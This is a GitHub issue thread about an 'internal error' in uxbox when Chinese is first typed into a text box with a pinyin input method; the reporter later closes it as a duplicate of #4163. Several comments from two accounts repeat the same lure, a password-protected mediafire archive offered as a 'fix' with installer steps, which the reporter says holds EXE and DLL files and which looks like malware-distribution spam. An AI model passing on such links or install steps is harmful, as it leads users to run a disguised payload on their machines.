### ISSUE TITLE
bug: 创建文本时首先输入中文会引发“内部错误”

### ISSUE THREAD

**Issue by szc3h9** [uxbox/uxbox#5039]
### Steps To Reproduce

1. 创建画布
2. 使用文本T字按钮创建文本框
3. 在文本框内首先输入中文，当确认后则立刻引发“内部错误”（似乎与拼音输入法关系更多，使用CTRL-C复制中文没有任何问题）
4. 在“内部错误”界面点击“重试”，发现内容其实输入成功了，但是需要手动点击之前文本框才能显现

### Expected behavior

可以正常输入中文内容而不会引发内部错误

### Actual behavior

1. 在文本框内首先输入中文，当确认后则立刻引发“内部错误”（似乎与拼音输入法关系更多，使用CTRL-C复制中文没有任何问题）
2. 在“内部错误”界面点击“重试”，发现内容其实输入成功了，但是需要手动点击之前文本框才能显现

### Screenshots or video

<img width="1428" alt="image" src="https://github.com/user-attachments/assets/3c829ac3-d48e-4717-a72e-2c40cb90bfff">
<img width="1433" alt="image" src="https://github.com/user-attachments/assets/d80f56b9-d02b-433f-8acd-c18843f1f25e">
<img width="1063" alt="image" src="https://github.com/user-attachments/assets/5f75b744-4665-435c-8d1e-e10b052a78d4">

### Environment (please complete the following information)

OS：Microsoft Windows 10 Enterprise
Browser：Chrome浏览器（128.0.6613.113）
输入法工具：Microsoft中文

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by szc3h9** [comment]
@KrissV2 @rickdoq 
中文：谢谢哥们，但我从你的文件看到EXE、DLL文件，但是我是在Rocky Linux 8.10 x86_64 上通过podman、podman-docker运行的docker镜像，访问的Web页面.如果可以的话，请告诉你看到的相似issue的链接，或许我能从中有所收获
Google翻译（English）Thanks buddy, but I see EXE and DLL files from your file, but I am running the docker image through podman and podman-docker on Rocky Linux 8.10 x86_64 and accessing the web page. If possible, please tell me the link to the similar issue you saw, maybe I can learn something from it.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by szc3h9** [comment]
sorry，提交前没检索好，这个提交是重复了。首先查看到了 #4998，进而追踪到了  #4163
this issue here as this is already being tracked on #4163
